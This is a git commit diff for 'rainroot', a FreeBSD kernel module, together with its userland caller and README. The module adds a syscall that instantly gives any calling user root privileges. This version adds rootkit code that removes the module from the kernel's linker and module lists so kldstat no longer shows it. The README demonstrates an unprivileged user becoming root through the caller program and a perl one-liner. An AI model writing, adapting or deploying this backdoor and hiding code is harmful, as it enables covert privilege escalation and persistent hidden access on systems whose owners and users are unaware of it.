version 0.2, added hidefunction so mod is not found anymore easily
This commit is contained in:
your-favorite-hacker
@@ -2,7 +2,7 @@
|
||||
# $FreeBSD: src/share/examples/kld/syscall/module/Makefile,v 1.2 2001/09/18 12:03:42 ru Exp $
|
||||
|
||||
KMOD= rainroot
|
||||
SRCS= vnode_if.h\
|
||||
rainroot.c
|
||||
SRCS= rainroot.c
|
||||
|
||||
|
||||
.include <bsd.kmod.mk>
|
||||
|
||||
@@ -4,9 +4,20 @@
|
||||
#include <sys/syscall.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void help(){
|
||||
printf("rainroot caller\nuse appropiate syscallnumber (default: 210)\nexample: ./caller 210\n\nby dash\n");
|
||||
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]){
|
||||
|
||||
int scall=-1;
|
||||
if(argc<2){
|
||||
help();
|
||||
exit(1);
|
||||
}
|
||||
|
||||
scall = atoi(argv[1]);
|
||||
|
||||
syscall(scall);
|
||||
|
||||
@@ -2,6 +2,10 @@
|
||||
instant r00t :)
|
||||
ancient code, time to publish
|
||||
by -
|
||||
|
||||
added code for hiding the module
|
||||
basic hide code was built some years back during reading
|
||||
BSD Rootkits by Joseph Kong, it is quite nice have a look!
|
||||
*/
|
||||
|
||||
#include <sys/types.h>
|
||||
@@ -15,7 +19,37 @@
|
||||
#include <sys/linker.h>
|
||||
#include <sys/libkern.h>
|
||||
#include <sys/sysproto.h>
|
||||
#include <sys/lock.h>
|
||||
#include <sys/mutex.h>
|
||||
#include <sys/_mutex.h>
|
||||
#include <sys/sx.h>
|
||||
|
||||
#include <vm/vm.h>
|
||||
#include <vm/vm_page.h>
|
||||
#include <vm/vm_map.h>
|
||||
|
||||
#define HIDEMOD "rainroot.ko"
|
||||
#define HIDE "rainroot"
|
||||
|
||||
extern linker_file_list_t linker_files;
|
||||
static struct mtx kld_mtx;
|
||||
extern int next_file_id;
|
||||
|
||||
typedef TAILQ_HEAD(,module) modulelist_t;
|
||||
extern modulelist_t modules;
|
||||
extern int nextid;
|
||||
|
||||
struct module {
|
||||
TAILQ_ENTRY(module) link;
|
||||
TAILQ_ENTRY(module) flink;
|
||||
struct linker_file *file;
|
||||
int refs;
|
||||
int id;
|
||||
char *name;
|
||||
modeventhand_t handler;
|
||||
void *arg;
|
||||
modspecific_t data;
|
||||
};
|
||||
|
||||
/*
|
||||
* The function for implementing the syscall.
|
||||
@@ -41,20 +75,38 @@ static int offset = NO_SYSCALL;
|
||||
static int
|
||||
load (struct module *module, int cmd, void *arg)
|
||||
{
|
||||
int error = 0;
|
||||
struct linker_file *lf;
|
||||
struct module *mod;
|
||||
mtx_init(&kld_mtx, "hide lock",NULL,MTX_DEF);
|
||||
mtx_lock(&Giant);
|
||||
mtx_lock(&kld_mtx);
|
||||
|
||||
switch (cmd) {
|
||||
case MOD_LOAD :
|
||||
printf ("call me at %d\n", offset);
|
||||
break;
|
||||
case MOD_UNLOAD :
|
||||
printf ("call me at %d\n", offset);
|
||||
break;
|
||||
default :
|
||||
error = EOPNOTSUPP;
|
||||
(&linker_files)->tqh_first->refs--;
|
||||
|
||||
TAILQ_FOREACH(lf, &linker_files,link)
|
||||
{
|
||||
if (strcmp(lf->filename,HIDEMOD)==0){
|
||||
next_file_id--;
|
||||
TAILQ_REMOVE(&linker_files,lf,link);
|
||||
break;
|
||||
}
|
||||
return error;
|
||||
}
|
||||
}
|
||||
|
||||
mtx_unlock(&kld_mtx);
|
||||
mtx_unlock(&Giant);
|
||||
|
||||
sx_xlock(&modules_sx);
|
||||
|
||||
TAILQ_FOREACH(mod, &modules, link){
|
||||
if(strcmp(mod->name,HIDE)==0){
|
||||
nextid--;
|
||||
TAILQ_REMOVE(&modules,mod,link);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
sx_unlock(&modules_sx);
|
||||
|
||||
return(0);
|
||||
}
|
||||
SYSCALL_MODULE(syscall, &offset, &gimme_rude_sysent, load, NULL);
|
||||
|
||||
@@ -1,29 +1,58 @@
|
||||
rainr00t
|
||||
========
|
||||
|
||||
instant root-priv backd00r via kernelland anyone?
|
||||
instant root-priv backd00r via kernelland anyone? get root and hide the module.
|
||||
well this module, once loaded gives the thread/user calling instantly root, without spawning an extra
|
||||
shell or alike.
|
||||
|
||||
new feature in version 0.2
|
||||
--------------------------
|
||||
|
||||
automaticly hiding the loaded module, be aware that you cant easily unload it now ;)
|
||||
|
||||
usage
|
||||
-----
|
||||
|
||||
kernel
|
||||
******
|
||||
root@crashb0x:~/gainroot # uname -a
|
||||
FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014 root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
|
||||
|
||||
root@crashb0x:~/gainroot # kldload ./rainroot.ko
|
||||
|
||||
root@crashb0x:~/gainroot # kldstat
|
||||
Id Refs Address Size Name
|
||||
1 3 0xffffffff80200000 1755658 kernel
|
||||
3 1 0xffffffff81a12000 20e rainroot.ko
|
||||
|
||||
# userland tool, to call the newly loaded syscall (normally its syscall 210)
|
||||
No rainroot in kldstat, just the default kernel.
|
||||
|
||||
userland
|
||||
********
|
||||
|
||||
# userland tool, to call the newly loaded syscall (normally its syscall 210, depending if you got extra syscalls on your box already) In this examples it is syscall nr 211.
|
||||
|
||||
compile it
|
||||
l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller
|
||||
|
||||
test for help
|
||||
# ./caller
|
||||
rainroot caller
|
||||
use appropiate syscallnumber (default: 210)
|
||||
example: ./caller 210
|
||||
|
||||
execute and get root
|
||||
l00ser@crashb0x:/tmp % ./caller 211
|
||||
l00ser@crashb0x:/tmp % id
|
||||
uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
|
||||
|
||||
besides the caller you could also go with every language or operation requesting the syscall. for instance
|
||||
this perl one-liner:
|
||||
|
||||
l00ser@crashb0x:~ % id
|
||||
uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser)
|
||||
l00ser@crashb0x:~ % perl -e 'syscall(211);'
|
||||
l00ser@crashb0x:~ % id
|
||||
uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
|
||||
|
||||
author
|
||||
------
|
||||
dash
|
||||
|
||||
Reference in New Issue
Block a user